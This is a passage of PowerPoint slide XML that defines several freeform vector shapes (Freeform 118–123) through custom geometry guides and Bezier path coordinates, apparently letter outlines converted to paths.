                    <a:pt x="206" y="125"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="118"/>
                    <a:pt x="202" y="113"/>
                    <a:pt x="197" y="109"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="31" y="5"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="0"/>
                    <a:pt x="22" y="0"/>
                    <a:pt x="18" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="0"/>
                    <a:pt x="0" y="6"/>
                    <a:pt x="0" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="27"/>
                    <a:pt x="7" y="31"/>
                    <a:pt x="12" y="34"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="155" y="125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12" y="215"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="218"/>
                    <a:pt x="0" y="222"/>
                    <a:pt x="0" y="232"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="243"/>
                    <a:pt x="10" y="249"/>
                    <a:pt x="18" y="249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="249"/>
                    <a:pt x="24" y="249"/>
                    <a:pt x="31" y="244"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="195" y="14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7" name="Freeform 118">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08453DCB-AD96-4D77-B61D-43F44A1342B2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId19"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3427414" y="2800350"/>
              <a:ext cx="88900" cy="139700"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 121 w 209"/>
                <a:gd name="T1" fmla="*/ 174 h 316"/>
                <a:gd name="T2" fmla="*/ 177 w 209"/>
                <a:gd name="T3" fmla="*/ 230 h 316"/>
                <a:gd name="T4" fmla="*/ 116 w 209"/>
                <a:gd name="T5" fmla="*/ 285 h 316"/>
                <a:gd name="T6" fmla="*/ 57 w 209"/>
                <a:gd name="T7" fmla="*/ 270 h 316"/>
                <a:gd name="T8" fmla="*/ 34 w 209"/>
                <a:gd name="T9" fmla="*/ 227 h 316"/>
                <a:gd name="T10" fmla="*/ 17 w 209"/>
                <a:gd name="T11" fmla="*/ 209 h 316"/>
                <a:gd name="T12" fmla="*/ 0 w 209"/>
                <a:gd name="T13" fmla="*/ 230 h 316"/>
                <a:gd name="T14" fmla="*/ 0 w 209"/>
                <a:gd name="T15" fmla="*/ 295 h 316"/>
                <a:gd name="T16" fmla="*/ 15 w 209"/>
                <a:gd name="T17" fmla="*/ 316 h 316"/>
                <a:gd name="T18" fmla="*/ 33 w 209"/>
                <a:gd name="T19" fmla="*/ 293 h 316"/>
                <a:gd name="T20" fmla="*/ 115 w 209"/>
                <a:gd name="T21" fmla="*/ 316 h 316"/>
                <a:gd name="T22" fmla="*/ 209 w 209"/>
                <a:gd name="T23" fmla="*/ 228 h 316"/>
                <a:gd name="T24" fmla="*/ 185 w 209"/>
                <a:gd name="T25" fmla="*/ 168 h 316"/>
                <a:gd name="T26" fmla="*/ 112 w 209"/>
                <a:gd name="T27" fmla="*/ 136 h 316"/>
                <a:gd name="T28" fmla="*/ 72 w 209"/>
                <a:gd name="T29" fmla="*/ 127 h 316"/>
                <a:gd name="T30" fmla="*/ 32 w 209"/>
                <a:gd name="T31" fmla="*/ 80 h 316"/>
                <a:gd name="T32" fmla="*/ 92 w 209"/>
                <a:gd name="T33" fmla="*/ 31 h 316"/>
                <a:gd name="T34" fmla="*/ 161 w 209"/>
                <a:gd name="T35" fmla="*/ 93 h 316"/>
                <a:gd name="T36" fmla="*/ 178 w 209"/>
                <a:gd name="T37" fmla="*/ 107 h 316"/>
                <a:gd name="T38" fmla="*/ 196 w 209"/>
                <a:gd name="T39" fmla="*/ 86 h 316"/>
                <a:gd name="T40" fmla="*/ 196 w 209"/>
                <a:gd name="T41" fmla="*/ 21 h 316"/>
                <a:gd name="T42" fmla="*/ 181 w 209"/>
                <a:gd name="T43" fmla="*/ 0 h 316"/>
                <a:gd name="T44" fmla="*/ 162 w 209"/>
                <a:gd name="T45" fmla="*/ 24 h 316"/>
                <a:gd name="T46" fmla="*/ 92 w 209"/>
                <a:gd name="T47" fmla="*/ 0 h 316"/>
                <a:gd name="T48" fmla="*/ 0 w 209"/>
                <a:gd name="T49" fmla="*/ 82 h 316"/>
                <a:gd name="T50" fmla="*/ 64 w 209"/>
                <a:gd name="T51" fmla="*/ 160 h 316"/>
                <a:gd name="T52" fmla="*/ 121 w 209"/>
                <a:gd name="T53" fmla="*/ 17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9" h="316">
                  <a:moveTo>
                    <a:pt x="121" y="174"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="177"/>
                    <a:pt x="177" y="187"/>
                    <a:pt x="177" y="230"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="256"/>
                    <a:pt x="155" y="285"/>
                    <a:pt x="116" y="285"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="285"/>
                    <a:pt x="77" y="283"/>
                    <a:pt x="57" y="270"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="256"/>
                    <a:pt x="34" y="236"/>
                    <a:pt x="34" y="227"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="218"/>
                    <a:pt x="33" y="209"/>
                    <a:pt x="17" y="209"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="209"/>
                    <a:pt x="0" y="220"/>
                    <a:pt x="0" y="230"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="295"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="303"/>
                    <a:pt x="0" y="316"/>
                    <a:pt x="15" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="316"/>
                    <a:pt x="28" y="309"/>
                    <a:pt x="33" y="293"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="308"/>
                    <a:pt x="83" y="316"/>
                    <a:pt x="115" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="316"/>
                    <a:pt x="209" y="272"/>
                    <a:pt x="209" y="228"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="209" y="196"/>
                    <a:pt x="191" y="175"/>
                    <a:pt x="185" y="168"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="165" y="148"/>
                    <a:pt x="151" y="145"/>
                    <a:pt x="112" y="136"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="72" y="127"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="121"/>
                    <a:pt x="32" y="103"/>
                    <a:pt x="32" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="54"/>
                    <a:pt x="56" y="31"/>
                    <a:pt x="92" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="31"/>
                    <a:pt x="158" y="77"/>
                    <a:pt x="161" y="93"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="104"/>
                    <a:pt x="168" y="107"/>
                    <a:pt x="178" y="107"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="107"/>
                    <a:pt x="196" y="96"/>
                    <a:pt x="196" y="86"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="196" y="21"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="13"/>
                    <a:pt x="196" y="0"/>
                    <a:pt x="181" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="169" y="0"/>
                    <a:pt x="166" y="9"/>
                    <a:pt x="162" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="6"/>
                    <a:pt x="115" y="0"/>
                    <a:pt x="92" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="0"/>
                    <a:pt x="0" y="40"/>
                    <a:pt x="0" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="115"/>
                    <a:pt x="23" y="148"/>
                    <a:pt x="64" y="160"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="161"/>
                    <a:pt x="114" y="172"/>
                    <a:pt x="121" y="17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8" name="Freeform 119">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{712D7629-1775-449B-B74B-4712B1EBF265}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId20"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3538539" y="2841625"/>
              <a:ext cx="87313" cy="96838"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 184 w 204"/>
                <a:gd name="T1" fmla="*/ 124 h 222"/>
                <a:gd name="T2" fmla="*/ 204 w 204"/>
                <a:gd name="T3" fmla="*/ 106 h 222"/>
                <a:gd name="T4" fmla="*/ 107 w 204"/>
                <a:gd name="T5" fmla="*/ 0 h 222"/>
                <a:gd name="T6" fmla="*/ 0 w 204"/>
                <a:gd name="T7" fmla="*/ 111 h 222"/>
                <a:gd name="T8" fmla="*/ 114 w 204"/>
                <a:gd name="T9" fmla="*/ 222 h 222"/>
                <a:gd name="T10" fmla="*/ 204 w 204"/>
                <a:gd name="T11" fmla="*/ 165 h 222"/>
                <a:gd name="T12" fmla="*/ 186 w 204"/>
                <a:gd name="T13" fmla="*/ 151 h 222"/>
                <a:gd name="T14" fmla="*/ 170 w 204"/>
                <a:gd name="T15" fmla="*/ 162 h 222"/>
                <a:gd name="T16" fmla="*/ 118 w 204"/>
                <a:gd name="T17" fmla="*/ 192 h 222"/>
                <a:gd name="T18" fmla="*/ 35 w 204"/>
                <a:gd name="T19" fmla="*/ 124 h 222"/>
                <a:gd name="T20" fmla="*/ 184 w 204"/>
                <a:gd name="T21" fmla="*/ 124 h 222"/>
                <a:gd name="T22" fmla="*/ 36 w 204"/>
                <a:gd name="T23" fmla="*/ 94 h 222"/>
                <a:gd name="T24" fmla="*/ 107 w 204"/>
                <a:gd name="T25" fmla="*/ 30 h 222"/>
                <a:gd name="T26" fmla="*/ 168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4" y="124"/>
                    <a:pt x="204" y="124"/>
                    <a:pt x="204" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="49"/>
                    <a:pt x="172" y="0"/>
                    <a:pt x="107" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="0"/>
                    <a:pt x="0" y="50"/>
                    <a:pt x="0" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="172"/>
                    <a:pt x="50" y="222"/>
                    <a:pt x="114" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="222"/>
                    <a:pt x="204" y="177"/>
                    <a:pt x="204" y="165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="151"/>
                    <a:pt x="189" y="151"/>
                    <a:pt x="186" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="151"/>
                    <a:pt x="173" y="153"/>
                    <a:pt x="170" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="187"/>
                    <a:pt x="132" y="192"/>
                    <a:pt x="118" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="192"/>
                    <a:pt x="43" y="167"/>
                    <a:pt x="35" y="124"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="124"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="36" y="94"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="42" y="58"/>
                    <a:pt x="72" y="30"/>
                    <a:pt x="107" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="30"/>
                    <a:pt x="164" y="43"/>
                    <a:pt x="168"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 name="Freeform 120">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F51B7213-C979-4A52-A934-3C562F814CE0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId21"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3644901" y="2841625"/>
              <a:ext cx="96838" cy="95250"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 94 w 227"/>
                <a:gd name="T1" fmla="*/ 126 h 218"/>
                <a:gd name="T2" fmla="*/ 184 w 227"/>
                <a:gd name="T3" fmla="*/ 31 h 218"/>
                <a:gd name="T4" fmla="*/ 206 w 227"/>
                <a:gd name="T5" fmla="*/ 53 h 218"/>
                <a:gd name="T6" fmla="*/ 227 w 227"/>
                <a:gd name="T7" fmla="*/ 31 h 218"/>
                <a:gd name="T8" fmla="*/ 179 w 227"/>
                <a:gd name="T9" fmla="*/ 0 h 218"/>
                <a:gd name="T10" fmla="*/ 94 w 227"/>
                <a:gd name="T11" fmla="*/ 41 h 218"/>
                <a:gd name="T12" fmla="*/ 94 w 227"/>
                <a:gd name="T13" fmla="*/ 24 h 218"/>
                <a:gd name="T14" fmla="*/ 74 w 227"/>
                <a:gd name="T15" fmla="*/ 3 h 218"/>
                <a:gd name="T16" fmla="*/ 20 w 227"/>
                <a:gd name="T17" fmla="*/ 3 h 218"/>
                <a:gd name="T18" fmla="*/ 0 w 227"/>
                <a:gd name="T19" fmla="*/ 18 h 218"/>
                <a:gd name="T20" fmla="*/ 20 w 227"/>
                <a:gd name="T21" fmla="*/ 34 h 218"/>
                <a:gd name="T22" fmla="*/ 60 w 227"/>
                <a:gd name="T23" fmla="*/ 34 h 218"/>
                <a:gd name="T24" fmla="*/ 60 w 227"/>
                <a:gd name="T25" fmla="*/ 188 h 218"/>
                <a:gd name="T26" fmla="*/ 20 w 227"/>
                <a:gd name="T27" fmla="*/ 188 h 218"/>
                <a:gd name="T28" fmla="*/ 0 w 227"/>
                <a:gd name="T29" fmla="*/ 203 h 218"/>
                <a:gd name="T30" fmla="*/ 20 w 227"/>
                <a:gd name="T31" fmla="*/ 218 h 218"/>
                <a:gd name="T32" fmla="*/ 150 w 227"/>
                <a:gd name="T33" fmla="*/ 218 h 218"/>
                <a:gd name="T34" fmla="*/ 170 w 227"/>
                <a:gd name="T35" fmla="*/ 203 h 218"/>
                <a:gd name="T36" fmla="*/ 150 w 227"/>
                <a:gd name="T37" fmla="*/ 188 h 218"/>
                <a:gd name="T38" fmla="*/ 94 w 227"/>
                <a:gd name="T39" fmla="*/ 188 h 218"/>
                <a:gd name="T40" fmla="*/ 94 w 227"/>
                <a:gd name="T41" fmla="*/ 12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7" h="218">
                  <a:moveTo>
                    <a:pt x="94" y="126"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="79"/>
                    <a:pt x="124" y="31"/>
                    <a:pt x="184" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="185" y="43"/>
                    <a:pt x="193" y="53"/>
                    <a:pt x="206" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="217" y="53"/>
                    <a:pt x="227" y="45"/>
                    <a:pt x="227" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="227" y="21"/>
                    <a:pt x="221" y="0"/>
                    <a:pt x="179" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="0"/>
                    <a:pt x="122" y="9"/>
                    <a:pt x="94" y="41"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="94" y="24"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="8"/>
                    <a:pt x="91" y="3"/>
                    <a:pt x="74" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="3"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="34"/>
                    <a:pt x="12" y="34"/>
                    <a:pt x="20" y="34"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="60" y="34"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="188"/>
                    <a:pt x="0" y="188"/>
                    <a:pt x="0" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="218"/>
                    <a:pt x="12" y="218"/>
                    <a:pt x="20" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="150" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="218"/>
                    <a:pt x="170" y="218"/>
                    <a:pt x="170" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="170" y="188"/>
                    <a:pt x="157" y="188"/>
                    <a:pt x="150" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="94" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94" y="12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0" name="Freeform 121">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D98D6C33-A3A1-46F1-B63B-3A4505E39ECD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId22"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3754439" y="2843213"/>
              <a:ext cx="100013" cy="93663"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 203 w 238"/>
                <a:gd name="T1" fmla="*/ 31 h 217"/>
                <a:gd name="T2" fmla="*/ 218 w 238"/>
                <a:gd name="T3" fmla="*/ 31 h 217"/>
                <a:gd name="T4" fmla="*/ 238 w 238"/>
                <a:gd name="T5" fmla="*/ 16 h 217"/>
                <a:gd name="T6" fmla="*/ 218 w 238"/>
                <a:gd name="T7" fmla="*/ 0 h 217"/>
                <a:gd name="T8" fmla="*/ 159 w 238"/>
                <a:gd name="T9" fmla="*/ 0 h 217"/>
                <a:gd name="T10" fmla="*/ 139 w 238"/>
                <a:gd name="T11" fmla="*/ 15 h 217"/>
                <a:gd name="T12" fmla="*/ 159 w 238"/>
                <a:gd name="T13" fmla="*/ 31 h 217"/>
                <a:gd name="T14" fmla="*/ 173 w 238"/>
                <a:gd name="T15" fmla="*/ 31 h 217"/>
                <a:gd name="T16" fmla="*/ 119 w 238"/>
                <a:gd name="T17" fmla="*/ 191 h 217"/>
                <a:gd name="T18" fmla="*/ 65 w 238"/>
                <a:gd name="T19" fmla="*/ 31 h 217"/>
                <a:gd name="T20" fmla="*/ 78 w 238"/>
                <a:gd name="T21" fmla="*/ 31 h 217"/>
                <a:gd name="T22" fmla="*/ 98 w 238"/>
                <a:gd name="T23" fmla="*/ 16 h 217"/>
                <a:gd name="T24" fmla="*/ 78 w 238"/>
                <a:gd name="T25" fmla="*/ 0 h 217"/>
                <a:gd name="T26" fmla="*/ 20 w 238"/>
                <a:gd name="T27" fmla="*/ 0 h 217"/>
                <a:gd name="T28" fmla="*/ 0 w 238"/>
                <a:gd name="T29" fmla="*/ 16 h 217"/>
                <a:gd name="T30" fmla="*/ 20 w 238"/>
                <a:gd name="T31" fmla="*/ 31 h 217"/>
                <a:gd name="T32" fmla="*/ 35 w 238"/>
                <a:gd name="T33" fmla="*/ 31 h 217"/>
                <a:gd name="T34" fmla="*/ 92 w 238"/>
                <a:gd name="T35" fmla="*/ 200 h 217"/>
                <a:gd name="T36" fmla="*/ 119 w 238"/>
                <a:gd name="T37" fmla="*/ 217 h 217"/>
                <a:gd name="T38" fmla="*/ 145 w 238"/>
                <a:gd name="T39" fmla="*/ 201 h 217"/>
                <a:gd name="T40" fmla="*/ 203 w 238"/>
                <a:gd name="T41" fmla="*/ 3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8" h="217">
                  <a:moveTo>
                    <a:pt x="203" y="31"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="218" y="31"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="225" y="31"/>
                    <a:pt x="238" y="31"/>
                    <a:pt x="238" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="238" y="0"/>
                    <a:pt x="226" y="0"/>
                    <a:pt x="218" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="159" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="152" y="0"/>
                    <a:pt x="139" y="0"/>
                    <a:pt x="139" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="31"/>
                    <a:pt x="151" y="31"/>
                    <a:pt x="159" y="31"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="173" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="119" y="191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78" y="31"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="86" y="31"/>
                    <a:pt x="98" y="31"/>
                    <a:pt x="98" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="0"/>
                    <a:pt x="86" y="0"/>
                    <a:pt x="78" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="31"/>
                    <a:pt x="13" y="31"/>
                    <a:pt x="20" y="31"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="35" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92" y="200"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="217"/>
                    <a:pt x="108" y="217"/>
                    <a:pt x="119" y="217"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="217"/>
                    <a:pt x="140" y="217"/>
                    <a:pt x="145" y="201"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="203" y="3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1" name="Freeform 122">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84102C83-2D12-423C-A1F2-21E222A0457E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId23"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3871914" y="2841625"/>
              <a:ext cx="85725" cy="96838"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 184 w 204"/>
                <a:gd name="T1" fmla="*/ 124 h 222"/>
                <a:gd name="T2" fmla="*/ 204 w 204"/>
                <a:gd name="T3" fmla="*/ 106 h 222"/>
                <a:gd name="T4" fmla="*/ 107 w 204"/>
                <a:gd name="T5" fmla="*/ 0 h 222"/>
                <a:gd name="T6" fmla="*/ 0 w 204"/>
                <a:gd name="T7" fmla="*/ 111 h 222"/>
                <a:gd name="T8" fmla="*/ 115 w 204"/>
                <a:gd name="T9" fmla="*/ 222 h 222"/>
                <a:gd name="T10" fmla="*/ 204 w 204"/>
                <a:gd name="T11" fmla="*/ 165 h 222"/>
                <a:gd name="T12" fmla="*/ 187 w 204"/>
                <a:gd name="T13" fmla="*/ 151 h 222"/>
                <a:gd name="T14" fmla="*/ 170 w 204"/>
                <a:gd name="T15" fmla="*/ 162 h 222"/>
                <a:gd name="T16" fmla="*/ 118 w 204"/>
                <a:gd name="T17" fmla="*/ 192 h 222"/>
                <a:gd name="T18" fmla="*/ 36 w 204"/>
                <a:gd name="T19" fmla="*/ 124 h 222"/>
                <a:gd name="T20" fmla="*/ 184 w 204"/>
                <a:gd name="T21" fmla="*/ 124 h 222"/>
                <a:gd name="T22" fmla="*/ 36 w 204"/>
                <a:gd name="T23" fmla="*/ 94 h 222"/>
                <a:gd name="T24" fmla="*/ 107 w 204"/>
                <a:gd name="T25" fmla="*/ 30 h 222"/>
                <a:gd name="T26" fmla="*/ 169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5" y="124"/>
                    <a:pt x="204" y="124"/>
                    <a:pt x="204" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="49"/>
                    <a:pt x="172" y="0"/>
                    <a:pt x="107" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="0"/>
                    <a:pt x="0" y="50"/>
                    <a:pt x="0" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="172"/>
                    <a:pt x="51" y="222"/>
                    <a:pt x="115" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="222"/>
                    <a:pt x="204" y="177"/>
                    <a:pt x="204" y="165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="151"/>
                    <a:pt x="190" y="151"/>
                    <a:pt x="187" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="151"/>
                    <a:pt x="174" y="153"/>
                    <a:pt x="170" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="187"/>
                    <a:pt x="132" y="192"/>
                    <a:pt x="118" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="192"/>
                    <a:pt x="44" y="167"/>
                    <a:pt x="36" y="124"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="124"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="36" y="94"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="58"/>
                    <a:pt x="72" y="30"/>
                    <a:pt x="107" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="30"/>
                    <a:pt x="164" y="43"/>
                    <a:pt x="169"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2" name="Freeform 123">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD8D4C4F-8101-4459-96EF-0910A8A5BCA9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId24"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3976689" y="2841625"/>
              <a:ext cx="96838" cy="95250"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 95 w 227"/>
                <a:gd name="T1" fmla="*/ 126 h 218"/>
